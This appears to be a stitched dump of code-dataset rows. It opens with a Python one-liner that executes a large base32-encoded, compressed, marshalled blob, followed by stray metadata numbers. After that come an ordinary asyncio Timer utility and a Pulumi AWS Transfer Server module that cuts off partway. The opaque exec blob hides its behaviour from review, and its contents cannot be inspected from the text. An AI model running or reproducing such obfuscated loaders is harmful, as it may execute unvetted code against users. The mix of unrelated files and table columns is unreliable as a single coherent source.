exec(marshal.loads(zlib.decompress(base64.b32decode("PCOI3G2ZR5OVOWUGR7J6S5ASIJ3ZYNAN6QCSBRCFFZYLDZVBQUIGWRFZACSA4SERN5ICLJ62KRJB44EVKHKLP7CJ7YGTZ37WSACBUFB3WZH63M4HWW7OCHOW3L47F5HK2657Z6K373OP54W65F2D5HI63U5T3ZGDXXR4HPOT7GW6HQ23U7ZY6TXHW5HY7XR2HXSMHD2P453Y5T3PT7HD66L5TSB66HRHX6RZH5MBV7PDXHO7H6OX733U73QHJ7X52P42PJ7TZ5HOOD2PR7PD2PL4677735V5253XX7Z3R7TMZ66HYEHXJLJ6ODKUPJ7TY6T7HT2PR57HI6XY2PXZZTFN73QHJ7WF5HTMHU6DB5PX7PT7PJ4P75PHR5HA6PZ2LV6XR6XK4PJ5L7OTK47T6XL5OT5IVL766D2B75267XDWS377GN7X35WJD4UUN57ZZPNHEUPTQWG7KIW2L6C6A3Z7PR6ZJ77CIWW4PQP3345WRHJZR37DCR777X5HZ5PUYGL6OJYX773OF6WZWOV6OF27HZ6XY7H3JO7H37XIYFY4FRPTC6LU6HR5PLY7ZRM3V677WHD7KH77PQ75IWFG63XUP47ONT3OP6VGWXF6GD6LNP5KU2NNWP7F2D2W63VOX547S5BOPPYMYXS4PZ67T6HS7K3VPZ4LE5LXPP7TDT3QHTXRH7QJZ5ADZ3ET7YE46I7456PYOUSC5DRT37CPFLYU5ILV6XG5HT4DMTW7RP4PP33TLSR6O4M6PPYOZ6OT6OBS677T4R3ZZI3UHB7RCSFZJUL2DPFJAUHDUWZPNQERPQL6PPKDQTVUC4Q37KU35P76FVZ73T66OX46J245IMLD5R42MYL3ZA45L3LCVNTE6V454ONZ4UUYWUWD755KU3GTYYTRZHKVFK5L2MD3HUU4225ONTNWFZ2M65JJ7LXEO3F5K4LUV5NBU6NLHDNB3POGXH5656PB3H2SZER2LOU2F5U223MHGMZ2OXX5JJWYLGD3FDJXFXYQMJSHRLQYR2LJ4V44PP35EUZLY3N3AZ7TPGNZASXJV3T6NSTMHPH3LBQ3VZLJXXM2OO4DQTFUFOWFC65NOP3VK25O3OT3JUUYBTF5VEN5L5Y63YVHZF7K7TUYYJED53HCLIN2HTGSI3QBS2OEKQMRDY47HQX2ZGLC65YYLOX3OEHPCM6EWSTWAJ6D2GT4RJ7Q6JMJ23V4HTDKPPD4LLO6LWMK37ON2WE7NRH2NROEHGM47UPHMC3OWJUQRBCHJMYNFWSRETJIQZYBFBG4JUNMTGI6JVPO4OBWPVHC2GK3TBRCHPNNV4MUN4JR47WMSZEJOOLBBUQ2FHCOMORVYL33GE5A4BLEWPK23MWUTKS4C5ZPBXFW7I4ZHCLGDCZUVYZ6GYYQDK5UGLEUBIT42ZZY6KZJU3PEXHLFSDELBHG3ZF5Z5WYLI5VFD5QLIMHYHWJHXZTMIO2ZG5WFKZPMKIBN73KMFE4R2TTDE5J2YL3T7BWGZV6Z3W3W4CKJL7GZD7PN5XYIXGW5YVYLPMQJNOSZQV5QPHMB36OKTPMYP54ME6G3FIRFNDLJGATOJMIKWBWNUP32RBDE5ULHSNCFXROAZVECLWC4EG7445JG4NED6EWRBRNSM6PSTTM23OUIZUQSWMIFU33TDIZUEHB4M5JYQVC2JG5Q7ETN7QOCCZLKWYNLXBUNXYCEHVINZ5AEPH4RDST3IOMPMIVH3FO6NTF3WB67MLMYXAW6GRNNQ5KGX76KQCSVDEQYZPAJNMHI4EZLSEWKXNKWLWQ5B2LQHOU6TPV4WHKMKMTGS43OWXT62UYWMWEFDCTJJ2L4H4WWGG5LAVLUHSYK2K2K2LQ2ETKRN7HOMSP3Y5PL4Y3HXF6Y4MTKIO7EY2C42U5EYO46VS6YV3NDC7HJHRRHU335VTPLQNOULWQVFGEF3LOZTLUMHMKNBBUW5WOGOV4MBM4CDFENFD4OZUZRQZDELGOQG4EAADCUIMIVWYWEVFQYP2DIY7VCGM63TTW62MQEQPZTEE6KRKA6SZUPLF3NXVDR3RLNLYLG3BWXC3XGG4MJHS24V2GAUHVYCJUPJYTGWSXPRETDUXNBEQGF6U5SMY6ICMES26NPGKEG2GLNKJ5JMLVRRGKJE7EQVBID4XAOAADOPKK3HKQSKH3HGNZUOADY2W6FMGZ4PIBS6NJ3UDLELE2AXS4HJBNJXXIFKIDDDMSJZRTSWU4RKTXVLVQ43NJXS4ESCQGRCYGQAXWT7A4W3YGVRYDGQUX5COECCRNBCEKPBLUVGRFYU5HBUTSYPSWK5Q5NUKSMHMX3BG2WBUJ5QWZJB2HIMMNSUJG43FXCIZUIG3RQCMHABPB4KEOT25AGGZ5YIWJK7WM6CAQCUWXZ2NYEE4BYPNUDP6M4ECTAXK2ZCUORFRSXCMMIIQVTUDYQPFTOGCQNAZNOOMMIGLMEGCVDRVYAJJJ4UGEA3WVYHVNMZTTEC7ZZVFLQ3LQKWESA5UB5NSQSXHXIGGASRNGZ6VQSMAQRXLUORZNCUNJSPTXEF66HNYRPATRBWRAUGQ2VZ3BCUSMA4WEWYXDNOOBC3AASNQMUYJYIUA2RHZDJTFICMM52MFTNDV6WLVYYXO2DVPPKIATRDAREEZR5AVXUTCAIQL7AUNPUCYA6NXELPJ7BFFV2YCVWN54MIUHTT2EHXGCLUDFIHOFYL5YGETVRSJHXUBH6A2FOUKH6XADFJFY2JYKWCN7AYHXEBDI4UO5ZG2TFWMCLUV3AE5M3NACNAWCHCZGODF5LBM3IGW3T4ZX5WDFUBPGIN3PA6IKGPMELK3VLNQKLYGIRXNYAJFRFUYI2B66HJ7SCGV2GH6AEUB22AGL4CSCULGBLDEPL6AJUI7C7MDLSGQVHKVOUARESWQBF2VNTW5PPVOUKOZQRN4R22EFW6ES6NWITPFTNMFJ64QMOQXRJINSAUOAT42BM3GXPTW4NMYFYMOMPITDUHNMO5GUGQ4YBZPJSJAWKSDBOPNXLN2TO3FALCVAYSUSJ5LMQP4CLBAHFMZRAURZRQFQJW5DXPYG5GETEBBJAEOZVKAOWBGE7P3IHYU55ZD6SX6QBXZETJEYNMW4WDABRUA7FWRQ3A2UV6HJIZ7GVB3IRTE2MZCAUEZ4UMAKURKDAPQJ6AB6OAVWAKLZBNCRC7IIEUKYQORHTHU53QS2K3GEGZGJXITGTOMGI5J2JG5IV7NWFKA4ACCTSEXJOSVKPNGBG7QU4YNNERNYKSWXYNZDKGWVKFUDHCZ6ZGF64J37SF6LAKNIBHGIER7HBVUAKUYFQA6AYTX5LFPSGUUSBQOXTITHDJ2ABQVDPBXLG6SAHRIAFBWPRMOCUSU7RUBO5KVDVVAQFYO4FCCWZYEHXLDUCWKSCHPOVVQ3FFC6EQHFA2HUHDVWDVMAPVRXAQVDIS5KFE5FFFS5CCWA2ZJ43RMEW4EB22TK5IJULXAOSKA3RD2HUDBWEEA2MY6BRNOEXDMOVHQBANAJIA5FRUIUWGFQHUQ3KZMZGPAIADPMI2QYGWZVKRHBAFWBAOFCFYA5IVB62WGRVQFEQPJAXOXVXILCTAEGC4BJ7XH7YNIFTDALQUBYIFDCUTMKRFCGC4HV5S46OEQ42JCQTPBVBYHOQS7JO72TBFIFOMZJO5QBX4SOJTYVG2IT5IQ7XIECOFAAZQHNRMD2Z3ANPRTKUYB4YVAISJTEXOSZ5EANJZSBBKPYKQBDUNLTJRKPKFHUGVEKTHZBUO25CNIGGTDL2AT4W6YCTJXVEDKBSLDF2JEUBXIRNIGYCVA2LVBOAG5KFWCDFD7QMQADLFTUUE6NACAF5UMJCFW4G3XMZCFNGIGPVBGCTLWMGYCL3HVJ5IAKZAAASINZMHYEAHUFCJKZGCNCABNYIAIVNJS6AAMZAW6KRCG7GKG22KCFDGIQ6KU5SLUUZSMKC3JDYIQNVTBD44ZNSIWKG72BNN2BMVZA5WML5GRCRQ7RDMIS3MDT5H6VY2E45JZHSB7CQFFKBIRMG2XMMCWYRGHTOHUDDSMLJSC7MI7ACKRJKSGIQD35HTIZJM3JCR6LBHSLALTIPMPA7HOCSBN3O6WGHBNMB6IAX4LJYXOISIFIOOAIMS5UOXTLGMBJXEJASVQGGJZD5RDOGBHJGCHVG45VWLBZYAA2QMMCP2IR7J5WUJSULJNMYHHZN6OBUDUIRMZ2J2HJJQHPJ5BIA5VAQGRFGNSKGVOM6ETYO5NCO5ERXTXVZLUICONYCK2HFQEHFEQMRGC3YK6BC3CBQTJEVWPFQSJCHPQS6IWTXG2LYN5XBMFUHHRUM2JBQFYNTZKAAZIDAE6YUVNJTIKGFPSDQXCRROS6NHAKAFDOGUJEJVWQ33DPWWUQKVMM4SIOYVK2V4EA42B6DZXARUMBM2A62EZ3QOPOEQHWMQMCRUHXXR6BU5BQQ4IPI2CIKACOOMMYBQQ5CZAIO3PIQLAG5NBFPABIOESEUOCTZNJXDL3AD24VV2GETWQWARRJFERECAGCMKCFD3AN3ECLGRZXHFH222BJAWRMNPLCQ6TS5GRNWFPVIK5NZYJBTHXBO2KD35IIUTCNKEXSQ3KIBBD3YABZM7ATBQHHVAQIWOYXBHP3C4B4GBY56ERH3YBAMQ63FESIZ3YCGIOX2G2BEPNJA3RZXKUM4CCL2LKKGUOH4LGRHQEODTEOEHNUUFTBJKOS3QBTEETQARN6GKM3TN5UA4LDIF6UNDCTFUX43PAYWEA5KQ6B3UBJAVRLAJYEAXKQP6SSOUUEXJJMMT6BLY2BTBIY2EUG2EXE5Z4M5LZIWNUDXX5INCMZP2ARXMNWGAZCSJIJ2H7HTZSZKCC5NKULWZXREZVILKGZXL4VIQGEMXIG6ZALIA65E7MM7WPBW2KE5PCMDYJBN32KYMQ7XG5BIVMWBT5FJCUD7LI5QROLHF6PWSFUIX6SR5QJMRIODAMWIZ27AC2CIDSUO4WWYOAKR4RZREK6AAXPABSRQ2JJDNGFOIQFE65QONCECE6FKJQQ4TCFNMCBQ4UCCABHOYDGUMNLAPKIGTZAVR2SNX64CD3IQ3FBIYW4TEXK2BHNKFALLUYY3S7TFNEZOAT2OAMRKAMQRGI6NDEDORNAUOWROQCQC5IAKZ5NSI5GWULEUTJY7JACOAQPGRWZA2KJOER3A6MBQTHPKU6VMXNABU3ATUN4CXRRGMSIO6IWETELE5VSXTHIQFNGAYEGHNAKJCTXOMUOYCLFZ3JATXSBQB4PDVE47SSFYEDZ6ZXDBPNEVSVDNSBWPGDLFJDCC23QGCUCTT4EP3OUNMBFUKA5VWI4WLABWHQIWZQ4PNIPB6AANBNEBH4MGQOVMEL7DBQFJKTGEQYR6MBQS6DFUSP3UDHRTFIFCN6EAA3DGQBGEMFNHIFYJ5SGRGAJMYQRKNJZN6E2KTKQMVBYJ7MATQVH7MKIWQA7JWNQRVOLCVVGFOUPTCJULKB27AHUBBZIUUJIMQEANFD2B4FJNCGLJUBDDCNOGQP6VDSAN4YCK4TXSCJAV5W7PIDRBHXI2WIRGKUMADBJENVLWSJJMGOVAUUAAL6U5DPUEMQAWGVHOIOBJJHUSGSNRYQGQLWJX4AW5KAORMJNYSKYCZZW2A7JOLIE2DAR4EYNPRGBZSOLO2DTOUQ64E4FRRO4OARO4FESCT7MAMGJEFTUFMY5VYBV2EYQKJ2XU5IMSIMJ22S4YCCWE7FCC3BZBZVYO4EAIBAZYREFIUTYGSIOT4EV5FAM54XHWYQTEZS2FJBO5JBKTQBHJI7LZXF2OKY3ASLCKTG2OAXNJGF4KVLX42JV5EHYYUMRBXPWKI3724DJNLA2ANAUS3TC2AJYAD2F4QUR5EAKMBPVUODQ6EQORRA7HAIAALNICRD6A44JBSHWQ4XU2C3VEQEFWF4FEEUO3UJHWQ2HF4TKS3PIFFSLEJ56TBBZC3XCZQKBLEAGFDD5N4VJKUNLGWWHZAEIVRX4WVFAMJ6VVVFJLY6JCGMQ522EUNC3TJBULKKN5DGUACAU34PPE4ZB5Q4BYRKQVGDTW2UMOLJCWJ4CZ7EA4PA6MQMC6SKIYWSRRMTAK7GG6AL4STGDONKIW5I3FRWMO5PCAXQJIWNFZOLUD3JT4UVWVBD5MDI5TBYCA25MO6FMQHD4WABHIIOVOBSAQY4A22QHEYRO7IMMYMCND4232IILAIVQQMPB2MCI3VBDPQZPFDKVQUYBYMKB62SLBM7ZRMLKLCCQ27TBHCBC4GJEUTOP2ZXIICYLACNBYFZMDSOIOAA4RUJ2T5JAGSECEAF6IHS23VA5PGIUFKLP7SKFWCULHRVYTQPLRA6ZMAKAZFE2UYW4SVI2SEOQZJBGSCURZJQMVKD7EPDYDHU5V7TWCPAYUYVYQAINUFUQUCJKEHCAW5UYSBISAULBE7KZUV37VCEUADA34DUVWFGQ5SYCKVMAU4ZJAZEHDBFNKLBAAGZRBZOFP2276SIR7G25A7IRDRGBD7AUPSYPZKOW5CMXAKYHAEUZAVLLDZGCTDFS7XA6ZBG22AAX3K4DCMOC3UESWRIRKWHQRIHZVD526GWCFKBSLGMSSININPBR37J5BXAVW42JDXEQTUASTNXEHMMWR5HSYWFYQASZ5A5LF4HZXMDUUWNLKYPKKBVLMSEYHRPBMOR3WGQ2RMF73SILBASPDQFWACVYEM3RFXJSUPXARSEKNCQZ2FNCR2HJOLRTB7OUHPDBLG2QSEBZMTVWRC3RRIFENQ2FE2BSDBDV6MIPFF7JICGEHKB6GAD3RNTXCHSQIOGQGOOFNNUQQUNUOZVWRGDME7EUUWNLKV2BSYT2QBRAYQCLB5MSW52JGQ6JLPMIDNHWWKMTRQL3CAETIBDINIMRTWYBKLCBM42SQC5JUG47RMQDMMP4YNZHGSNF2JPECBA7QJN4BGFZBLIVGZ4AY4BSSZQSOCQBP6IC3QBMIUG3VZN2NB4GUSOFFUARDNKCUEWZQVE3RSYFUF4HUHUTBXYYL4YZV6QQSZV5VNJDYCIZTMOIISTC3SEQZRABGKUJY7JNMWYQR6LPK2BG5ILBGSTFG54XVHAVQBSTKXFAEXOCUMFDPGW2GJU64FLYLTDVVICZCCL72AAWWOJ6Y6WLKM3YAOY4CDSRODKVIIN6SEOSNHJQWB66BLPSLY7BMHVOERBSHZR3ZRE5OT3GITJWEV72NRMC3I2FTOWT5Y7BVAVLCLDQC2SCVNCM5IIVVHRUKAFI2ZFVAVXQDFC22EO3KGQC3WERKMKVHFEWFBBLK3DOCAMMU6DM7QACPIL6OEXQ3SCXQBU6AAT4QS4Z6BKLUAVGWCOXWFVXWNDKDI4NW3HVGYUC6I2A6LLNADOWQ2C4BEGQGURCAZI6ZFX3BUWNH4XS2U6RF65UEARUAJM24YDOJBZGBO3J6NBMQ5MQAQWFPM7MMT5NL3MMHK6TSAYL6W4JLAA6R4HAVDSD4UFKUH4FLBPSCYOV4M4DXKQJLSDNPIS3LDIUEUXEPWFMHPLJXIJ6AMULK2R34AIS2MZZNXPFV2JEHDFTO5B7H3WYYGXTWRII3CASCFZHD7AXHGVBL6TCTQOZCAM2ADROJG54ENHKTIBDY6ESI3JZXHJEYLJNOBOBZERATFWXKIE3VA2O4C5Q2AO6JULBGKRAZ42CCAOF7CVC7FZNTWT32LRR5V2CVONRNAI2DCHYDLZSNRWHAPGVCMV4Q6DFQ4UFSDA5DTAIDMSCQSTQGN2FXM7CMU2Q6SEFK3VF7WM32MM5B3ADSMYZMBKORCI3I5UOSWN6OOMXBQUM4WEJ2QQNAUQLTQM3MHMMM5KQK5IH5C7SQBRN45BIO2EY5J5ZQKVQCEKIDWCLZG7AAOGATHGDTZAQVBFHEA6VCVUIH4GWN3BE2S3ZEJRRBGY4LMTAP25XLXEVFVYUJ55YXC265EYFZFGPZS3PULG2XD24XKV6ELPNUBEE6LCOKYPROCIDEGCDRKIBQIBYKEZTYVSSNAQGLUUVSAX3TGMK25ANOFJXAU5KLLWCBTVVQZXFENK2VAGI6LJEEGVJYCUZIK3ZKH2CHUKGUPKBNK6PYILYIOTTWWCZ6BIL4A2KCBVMPFE3ZQEPUKIAVI2D7QAZYDFDFF4ERDGG7XNSIGK7YCJSJKHUBCRSEMZAGWVS3LTCMNHR7XAX4BFSUPU2BB2GLSFQ5N44O4RO2FBP5SJWMBPQQZ5XQYF4HFAVSDKTM424HOF5WYIGPDEVCHWVA4GGSSZS4FINI4ZSA6KA3MSIMJFEBYVT7NCCYIQIOVFM53MUB23NEQMAU4YUOF7BCYMB6WLLNSUQPSOVSBKE344MI3AOXUEX2SBWUFGMQKE5ME2KLQVYABNZ4NQXLJGA4G66GVDYNLQBAXAQMNLCCFAI4H2XGW5I53SDLRYCHLRX3B2HY4WREOLTU5QFRMD2YFIFCMZKXEHQK2TJQCJHCDALM5ZIHPCD4X3AQK2S7KDNXSXPDVC2JONSSHJ7ZD4SCTXYPQFHJLIWJQVRM4AA6HRJXDBSMZCORSZO5LRRIC3A7KUIFHXIIQR2QEAFMCFYMB3WQ5MJQ5OYCEXUUO3FGAZ5EOLUWIZTGFRCAXKZDNVYFME5MUSRJONTGNANGUXMEURKV6FED2PAVJBJ7KFHJBCRWUBVURMBIKCZ3AMAI6WRFED3AQ6VZYLTRARVYA4RUXW3N2AUSXNW23ASUVWQ6V5IFKCGNAIOTTASGFTBWAZCS2YOMKXDIBAWBWQ325DDQBK3SAZKKH47LSW5BG6FBNVIMZOBP7HMWDLZHCNKBSBQXVPJZEEE2OBLWUQWBZVGQADZ5RVOG4RAODE7SJORDI2QGOFN4RBWRPIXAE4AB37OBSDIQXWZ7ELZRNP7W4U7FPQDXEIJI2RNYQ4ICSW4KHMQEZJQRUA6CMP3FYQK6NMG7B2BYBL3ODQOQQZLFUJTLZ66R3KZFOPAHJBA3GWSM24DEMGCVOKTJOHNHUN2VIVHMPAXM6QRFIP25QFITWIYFQ2A5LJUXIUIM6PJBXE3KCGCIA7AHWQ2YIA674CBV5G2DUCM23EBJYZCUC2UQTDKGI3RCBFU2WQTNCAY6CF7FLO3CKN5SKIKJT5NSKEVZRX5KZSFZNF4Q4IWABAWYQXFF4ZI7TUVQPJ7EYTSLUR4CRHDUAP3F3UROEN3YEI4RURDFIRMR6VL6XGGHJKORSFRBAEYBIJBCCVAXFENDCUBRJIVHP2US5ELWONI4WEOC2BASCFKYEMNFFAJVDRNOBQ5CUACCECQRH6CIUWC2FLF7IMF5UBKGPHNC7H3CNHABMEICZYH7JDDZWAGEABVYC64W73S7TGMYXGER25STRPTNFNJINHUB4NPB6UPA6TIEQMLKUAIGTNC7CBVYM4CM2FERBUGTAJHYAQ6GI2AUK6T4XZFGB3BQCE2VVUETHYVFPVYEXCD53JJVWR5L6DE7TLVFMLVFDKQX3XF2YHJ6LZXROZFNFTMCBC4SWQVAZCDXUIPLKH5MHVSEYCBDLJUBJ3OZO32LITDT5Q52FHTJA4JIN6UVTLKTVLHXUQFNYTK6GJ5R3SZFAHBU2ZVRWFGBZ6CD5QOSFX6KHVVEKBZNWZIJK2FHVZLUONHPBSCOWDI5GQZPKQJTUEALHUSEBZIQ4DAAJSAXCIFLRWZV6UZLI74DEDQ3HUKMW3BXMQNQAK3S3IIKIAZQIWFKAEU4W2OHAQZI3UDHG4IXNX62CIYRELSI3BVCZIYQ7YFE5W4CGKZPUP2AL7KEME3VQANTHWJ7NZZDNAWZSV55S3IZNYWLTRYHC5BHLXA43UFELSOPILSEU6GIMTBXFUWNJU26JHLS4KBI4MORIVZTTSWUKUSJB5SOCRBBCMYBFTIXBXMBWEYAT4MECI32J4WQAD32H7FDVLJOUD4I2XQZ4H7L5IGLWB3ZESJ5D4XTVQCG3QGBHVMPC6D4ARRNUQNCWNKN4NGFQQ3PJQSG37ERUIWQWFIK3IACNBEUWUNQABMJUATX3KLXTCSMAKAAHQU7HHQYJWZ2DDUEKA2IFZNFS4V6ZUSSGL4EWH5H52VR4C2ENAT3R2NFGWKDTZLHZHAONMNEBSLQSSGZRQGQF3JGZ2CJBVA2GQR2ON2ECBYFAKFQRX7ZRNBJ7IC73OVW2LOA2XOME6VY3EG5WSPYSW5R4JRVUZRCIQGTQ3VEA4JQYCMNCSW4UMQU4SIYWKDC2C64ATQVO4ADMRV5PCAXRIJKFGFEFBG52J5RIOEGURSWTZAE25333GCBOLAD64D2DC6YIBEMCVM4OIDMZ4GIMPTRSSC7NCNAJLSCMSQGYSUIXWVOPVRXWTBD2E6E7K3TNVL22HPTKRQIR6LJBUJHUAP6HVBMZLJDTO4GAEW6QHFZYG2PLZOXXKYZ5HBWSHIKEYBTDI3W4H3ICUD67F7I5F2OYRQSAXPBHWWXAUGJWXBDY43H3T2ZEUPJPK4QKYDAWKNYSGPKBXHDC7LLP53FOGVPGW67RAEMQFFVGRYCRWQW26Q4UTQA52SFZ6QSXNMCV527DYBBNHVNSMYQZTWWITDQZUAAGMKELNXXGUD53JDM7WBHEABTP24O3ZSTZDBSK7E5DKGUKI7X3I436RDJG3AM3K5CGPNULWEPV4RIUXO3KQFDFW5SSNJ26S5BGZFIAUJQT5OZCEJ6QHLDW6DETTRNDYGG2JVXKCVNNS7UEJLVPY6SDHPOHOMQGJIGQNFSVQHM6HNLSVQUAFIA2NV2CJIRISUEBPLB2C2VONR4PFENVJKIFZV77BNKOXNI7SIDBHOPLVQOWHLSXF5IBQEKI2YHS24APPOUQY6IIMUT3ZDUGIXDI3FNBRVRS2BZV3MM3DAPOYTBZXIKFA2ILVMAXGKJCFDZQRNLLUOQ7D6M6R5JGRUKTOJV2O5UGB4MJLNIDZUDC27BZNUDXVIRK3WWGRQZSCPLJFEBXBCJBLOIRB6ZP6YUTYRA5C2EPFWTXLLDHVVB3W4MXPIHCWP3S2W6WVOTFH6F2Q3EUHSTWBB4ADPILYL6GWUVNLOQEPDAJSVQRHPIZKFC4OK3LXQOJMRV6YLLOQ2QPKCLVO3QFOKQHN5NADGCTVAQ46WQEKESBWLML6LJHFSL2HXVUMPO6LDEUVTPPMYRC5CYELTS2RN5PWBZMDJFKZE4CEPVYYQTVTHI5W4KERILXWGVIA7KDGOMLQAROUBOMOERRLJZXIGIAB7IEYPQQISRTVBEBFBTKRPN6FK634W2TQLHFFG6YVJ6VRMRLGWN54SAAAGAHQEAJ6GYBUSYLEVSYS4TJHNFZUIK3MBMK2L4V534APC6AKUA6EZV5UYXRFCK2EVU4RAT5VGQV5KKDC7IYJRAVCNIWNWWVK3KGEI4SSXZMWZII65JZNEXVAOS4IQ5R2GUJPLEGQZ3EPLPWW3QO3DD27NCH3QY6WDMFXIA6EHBWPHLCSIWQXALQVLC3ZUPPVHGYVGDQAILZDJATPINCJ57HCOU457274HP52PW5LTB7HZ57X5O4PL67D2ON4MLM5L6P26LXOP7BU67LU7L46T47HG7DDKO7O255S567PQNKT37Z4347LZOD4PXP6PU63ZO4X6W7HC52O746D4Y3P34632XDC6PN6PL7OPI6ONROT3OV3X7R4MLU6X357CU56BR6N3I35ON6HSXXXZ6VB27H65HX76VI7DHD7PE2HV5GNBK67TLXT463Y7L4OW77WMB6P33PT47Z3VYGEPW577V6LTO43J6773ON6UL4OTF6XG6L2SXBHDZ6P2PE7D33TRHZ5PF2PD47HS73XPB5M74YITB2OK7PWRP6LPD3O7W5X6SXEXYP4GXR6PZ4X64LT642PI575Z746XPTZ7H64H422TT7YPXPOXT577M3YDW77OFXX7QN6MEMNNA===="))))
| 4,004.666667
| 11,986
| 0.998169
| 12
| 12,014
| 999.333333
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.171926
| 0.00025
| 12,014
| 2
| 11,987
| 6,007
| 0.826492
| 0
| 0
| 0
| 0
| 0
| 0.992842
| 0.992842
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
22c4ac29812190aed8302089f1e5e7c9c504e426
| 2,610
|
py
|
Python
|
async_util/timer.py
|
leeopop/async_util
|
c39b38d0a156d53db46612f7389011dd17f3dc17
|
[
"MIT"
] | null | null | null |
async_util/timer.py
|
leeopop/async_util
|
c39b38d0a156d53db46612f7389011dd17f3dc17
|
[
"MIT"
] | 1
|
2022-01-25T18:03:10.000Z
|
2022-01-25T18:03:10.000Z
|
async_util/timer.py
|
leeopop/async_util
|
c39b38d0a156d53db46612f7389011dd17f3dc17
|
[
"MIT"
] | null | null | null |
import asyncio
class Timer:
def __init__(self, loop):
self._loop = loop
def trigger(self, func, delta, canceled=lambda: None):
async def _trigger():
try:
await asyncio.sleep(delta.total_seconds(), loop=self._loop)
func()
except asyncio.CancelledError:
canceled()
return asyncio.ensure_future(_trigger(), loop=self._loop)
def async_trigger(self, coro_func, delta, canceled=lambda: None):
async def _trigger():
try:
await asyncio.sleep(delta.total_seconds(), loop=self._loop)
await coro_func()
except asyncio.CancelledError:
canceled()
return asyncio.ensure_future(_trigger(), loop=self._loop)
def period(self, func, delta, repeat=None, canceled=lambda: None):
if repeat is None:
async def _period():
try:
while True:
func()
await asyncio.sleep(delta.total_seconds(), loop=self._loop)
except asyncio.CancelledError:
canceled()
return asyncio.ensure_future(_period(), loop=self._loop)
else:
async def _period():
try:
counter = 0
while counter < repeat:
func()
await asyncio.sleep(delta.total_seconds(), loop=self._loop)
counter += 1
except asyncio.CancelledError:
canceled()
return asyncio.ensure_future(_period(), loop=self._loop)
def async_period(self, coro_func, delta, repeat=None, canceled=lambda: None):
if repeat is None:
async def _period():
try:
while True:
await coro_func()
await asyncio.sleep(delta.total_seconds(), loop=self._loop)
except asyncio.CancelledError:
canceled()
return asyncio.ensure_future(_period(), loop=self._loop)
else:
async def _period():
try:
counter = 0
while counter < repeat:
await coro_func()
await asyncio.sleep(delta.total_seconds(), loop=self._loop)
counter += 1
except asyncio.CancelledError:
canceled()
return asyncio.ensure_future(_period(), loop=self._loop)
| 35.27027
| 83
| 0.50613
| 241
| 2,610
| 5.282158
| 0.149378
| 0.087981
| 0.122545
| 0.103692
| 0.912019
| 0.901807
| 0.901807
| 0.901807
| 0.901807
| 0.901807
| 0
| 0.002594
| 0.409195
| 2,610
| 74
| 84
| 35.27027
| 0.822957
| 0
| 0
| 0.870968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.080645
| false
| 0
| 0.016129
| 0
| 0.209677
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4333ce124e776f754fe985b3d9fdcd7b7e97d42b
| 63,001
|
py
|
Python
|
sdk/python/pulumi_aws/transfer/server.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/transfer/server.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/transfer/server.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ServerArgs', 'Server']
@pulumi.input_type
class ServerArgs:
def __init__(__self__, *,
certificate: Optional[pulumi.Input[str]] = None,
directory_id: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
endpoint_details: Optional[pulumi.Input['ServerEndpointDetailsArgs']] = None,
endpoint_type: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
function: Optional[pulumi.Input[str]] = None,
host_key: Optional[pulumi.Input[str]] = None,
identity_provider_type: Optional[pulumi.Input[str]] = None,
invocation_role: Optional[pulumi.Input[str]] = None,
logging_role: Optional[pulumi.Input[str]] = None,
protocols: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
security_policy_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
url: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Server resource.
:param pulumi.Input[str] certificate: The Amazon Resource Name (ARN) of the AWS Certificate Manager (ACM) certificate. This is required when `protocols` is set to `FTPS`
:param pulumi.Input[str] directory_id: The directory service ID of the directory service you want to connect to with an `identity_provider_type` of `AWS_DIRECTORY_SERVICE`.
:param pulumi.Input[str] domain: The domain of the storage system that is used for file transfers. Valid values are: `S3` and `EFS`. The default value is `S3`.
:param pulumi.Input['ServerEndpointDetailsArgs'] endpoint_details: The virtual private cloud (VPC) endpoint settings that you want to configure for your SFTP server. Fields documented below.
:param pulumi.Input[str] endpoint_type: The type of endpoint that you want your SFTP server connect to. If you connect to a `VPC` (or `VPC_ENDPOINT`), your SFTP server isn't accessible over the public internet. If you want to connect your SFTP server via public internet, set `PUBLIC`. Defaults to `PUBLIC`.
:param pulumi.Input[bool] force_destroy: A boolean that indicates all users associated with the server should be deleted so that the Server can be destroyed without error. The default value is `false`. This option only applies to servers configured with a `SERVICE_MANAGED` `identity_provider_type`.
:param pulumi.Input[str] function: The ARN for a lambda function to use for the Identity provider.
:param pulumi.Input[str] host_key: RSA private key (e.g., as generated by the `ssh-keygen -N "" -m PEM -f my-new-server-key` command).
